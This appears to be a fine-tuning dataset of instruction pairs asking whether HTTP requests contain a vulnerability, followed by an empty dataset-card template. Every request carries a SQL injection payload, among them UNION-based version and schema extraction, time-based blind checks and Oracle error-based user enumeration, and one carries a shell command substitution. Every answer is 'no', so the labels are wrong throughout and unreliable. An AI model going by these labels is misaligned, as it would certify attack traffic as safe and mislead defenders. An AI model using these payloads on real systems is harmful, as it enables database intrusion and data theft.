<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=admin' ) or ( '1' = '1'/*", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "admin' ) or ( '1' = '1'/*" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=or 2 between 1 and 3", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "or 2 between 1 and 3" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or " ) ." = 1 or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or " ) ." = 1 or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or 1#". union select null,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or 1#". union select null,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=admin' or '1' = '1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "admin' or '1' = '1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=; if not ( select system_user ) <> 'sa' waitfor delay '0:0:2' --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "; if not ( select system_user ) <> 'sa' waitfor delay '0:0:2' --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=" or 0 = 0 --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "" or 0 = 0 --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 union select @ $_,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 union select @ $_,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = 1 <@.$ or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = 1 <@.$ or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "%." or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "%." or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or ",." or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or ",." or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=char%4039%41%2b%40SELECT", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "char%4039%41%2b%40SELECT" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or "1&" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or "1&" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=admin' ) or ( '1' = '1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "admin' ) or ( '1' = '1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=declare @s varchar ( 200 ) select @s = 0x73656c6 ...", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "declare @s varchar ( 200 ) select @s = 0x73656c6 ..." }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=or 0 = 0 #"", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "or 0 = 0 #"" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or ".]" or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or ".]" or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= ) or ( 'x' = 'x", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " ) or ( 'x' = 'x" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1.<@$ union select 1,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1.<@$ union select 1,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=$ ( sleep 50 ) ", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "$ ( sleep 50 ) " }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 *1 union select null,banner from v$version where rownum = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 *1 union select null,banner from v$version where rownum = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or 1#". union select 'a',version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or 1#". union select 'a',version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or 1#"; union select null,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or 1#"; union select null,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or 1#"? or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or 1#"? or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test="a"" or 1 = 1--"", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": ""a"" or 1 = 1--"" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 4 ) ) AND 'i' = 'i", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 4 ) ) AND 'i' = 'i" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = '1' union select ( \ ) ,@@VERSION -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = '1' union select ( \ ) ,@@VERSION -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=1 and user_name ( ) = 'dbo'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "1 and user_name ( ) = 'dbo'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=; if not ( substring ( ( select @@version ) ,24,1 ) <> 1 ) waitfor delay '0:0:2' --", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "; if not ( substring ( ( select @@version ) ,24,1 ) <> 1 ) waitfor delay '0:0:2' --" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or 1#"$ union select 1,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or 1#"$ union select 1,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= select * from users where id = 1 or 1#"{ union select null,version ( ) -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " select * from users where id = 1 or 1#"{ union select null,version ( ) -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = '1' *$ . or 1 = 1 -- 1'", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = '1' *$ . or 1 = 1 -- 1'" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = 1 +$+. or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = 1 +$+. or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = 1 or ( \+ ) = 1 or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = 1 or ( \+ ) = 1 or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 6 ) ) AND 'i' = 'i", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 6 ) ) AND 'i' = 'i" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=or 1 = 1 or '' = '", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "or 1 = 1 or '' = '" }, "payload": null }[/INST] no </s>
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{ "method": "GET", "uri": "/?test=select * from users where id = 1 or 1 = 1 -- 1", "headers": { "User-Agent": "PostmanRuntime/7.29.0", "Accept": "*/*", "Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1", "Host": "localhost:8080", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Test-Header": "select * from users where id = 1 or 1 = 1 -- 1" }, "payload": null }[/INST] no </s>

Dataset Card for Dataset Name

This dataset card aims to be a base template for new datasets. It has been generated using this raw template.

Dataset Details

Dataset Description

  • Curated by: [More Information Needed]
  • Funded by [optional]: [More Information Needed]
  • Shared by [optional]: [More Information Needed]
  • Language(s) (NLP): [More Information Needed]
  • License: [More Information Needed]

Dataset Sources [optional]

  • Repository: [More Information Needed]
  • Paper [optional]: [More Information Needed]
  • Demo [optional]: [More Information Needed]

Uses

Direct Use

[More Information Needed]

Out-of-Scope Use

[More Information Needed]

Dataset Structure

[More Information Needed]

Dataset Creation

Curation Rationale

[More Information Needed]

Source Data

Data Collection and Processing

[More Information Needed]

Who are the source data producers?

[More Information Needed]

Annotations [optional]

Annotation process

[More Information Needed]

Who are the annotators?

[More Information Needed]

Personal and Sensitive Information

[More Information Needed]

Bias, Risks, and Limitations

[More Information Needed]

Recommendations

Users should be made aware of the risks, biases and limitations of the dataset. More information needed for further recommendations.

Citation [optional]

BibTeX:

[More Information Needed]

APA:

[More Information Needed]

Glossary [optional]

[More Information Needed]

More Information [optional]

[More Information Needed]

Dataset Card Authors [optional]

[More Information Needed]

Dataset Card Contact

[More Information Needed]

Downloads last month
21